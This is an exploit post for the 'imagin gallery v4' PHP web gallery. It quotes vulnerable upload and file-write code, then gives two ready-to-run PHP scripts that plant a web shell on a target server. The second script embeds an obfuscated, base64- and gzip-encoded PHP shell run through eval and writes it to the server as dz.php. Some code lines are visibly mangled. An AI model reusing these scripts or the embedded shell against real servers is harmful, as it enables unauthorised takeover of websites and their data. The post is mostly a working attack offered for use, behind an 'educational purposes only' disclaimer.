facebook facebook twitter rss

imagin gallery v4 multi-vulnerability

Author: xev!l-dz , Published: 07-02-2014
# Exploit Title: imagin gallery  v4 multi-vulnerability
# Date: 01/01/2014
# Exploit Author: xev!l-dz
# Vendor Homepage: http://imagin.ro
# Software Link: http://imagin.ro/downloads/imaginV4.alpha.zip
# Version: v4 alpha
# Tested on: [windows 7 and kali linux]
# Disclaimer : all the information in this document is provided "as is", for educational purposes only. The authors will not be responsible for any damage.
---------------------------------------------------------------------------------------
REMOTE UPLOAD :
infected file :path/files.imagin/API/filesystem/uploadFile.php
affected code:
/////////////////////////////////////////////////////////////////////////////////////////////////
12 $path = "../../".$_POST["path"];//with slash at the end
13 $name = $_POST["name"];
19 if ($_FILES['Filedata']['size'] < $MAXIMUM_FILESIZE) {
20 // upload the file
21 move_uploaded_file($_FILES['Filedata']['tmp_name'], $path.$_FILES['Filedata']['name'])
22 or die ("error::Can't upload");
23
24 // move and resize
25 rename($path.$_FILES['Filedata']['name'], $path.$name)
26 or die("error::You don't have permissions to access the folder");
//////////////////////////////////////////////////////////////////////////////////////////////////
ARBITRARY FILE WRITE:
infected file :path/files.imagin/API/filesystem/saveToServer.php
affected code:
//////////////////////////////////////////////////////////////////////////////////////////////////
2 if ( isset ( $GLOBALS["HTTP_RAW_POST_DATA"] )) {
3
4 $im = $GLOBALS["HTTP_RAW_POST_DATA"];
5
6 $fp = fopen($_GET['name'], 'wb');
7 echo fwrite($fp, $im);
8 fclose($fp);
//////////////////////////////////////////////////////////////////////////////////////////////////
-Also you can find the same vulnerability in other files in filesystem directory !!
i already made a shell auto uploader for them
//////////////////////////////////////////////////////////////////////////////////////////////////
for the first one
//////////////////////////////////////////////////////////////////////////////////////////////////
<?php
if(!isset($argv[4])){
print 
"
[*]-----------------------------------------------------------------------[*]
[+] Script Name          : imagin auto uploader 
[+] Version              : 0.1
[+] Programed By         : xevil-dz (algerian pentester)
[+] Email                : rrx0xrr@gmail.com
[*]-----------------------------------------------------------------------[*]
usage: php 
$argv[0] http://127.0.0.1/path/ shell.php /dz/ dz.php
"
;
}
else{
$ch curl_init($argv[1].'/files.imagin/API/filesystem/uploadFile.php');
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,array('Filedata'=>"$argv[2]",'path'=>"$argv[3]",'name'=>"$argv[4]"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
if(
$postResult){
print
"
[*]-----------------------------------------------------------------------[*]
[+] your shell was uploaded sucssfuly !!!
[+] u can find ur shell her
[+] 
$argv[1]/files.imagin/$argv[3]/dz.php
[*]-----------------------------------------------------------------------[*]"
;}
else{
print 
"
[-]ERROR: shell not uploaded unknown error[-]"
;
}
}
?>

//////////////////////////////////////////////////////////////////////////////////////////////////////
for the second one
//////////////////////////////////////////////////////////////////////////////////////////////////////
<?php
if(!isset($argv[1])){
print 
"
[*]-----------------------------------------------------------------------[*]
[+] Script Name          : imagin v4 auto uploader
[+] Version              : 0.1
[+] Programed By         : xevil-dz    (algerian pentester)
[+] Email                : rrx0xrr@gmail.com
[*]-----------------------------------------------------------------------[*]
usage:php 
$argv[0] http://127.0.0.1/path/
"
;

else{
$shell='<?php eval(gzinflate(base64_decode(\'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\')));?> 
';
$ch = curl_init($argv[1].'/files.imagin/API/filesystem/saveToServer.php?name=dz.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
if($postResult){
if (preg_match("#error#",$postResult)){
print "
[-]ERROR: shell not uploaded unknown error[-]";
}
else{
print"
[*]-----------------------------------------------------------------------[*]
[+] your shell was uploaded sucssfuly !!!
[+] u can find ur shell her
[+] $argv[1]/files.imagin/API/filesystem/dz.php
[*]-----------------------------------------------------------------------[*]";}
}}
?>
//////////////////////////////////////////////////////////////////////////////////////////////////////
greetz ::::to all algerians pentesters 2014 -_-

Like us on Facebook :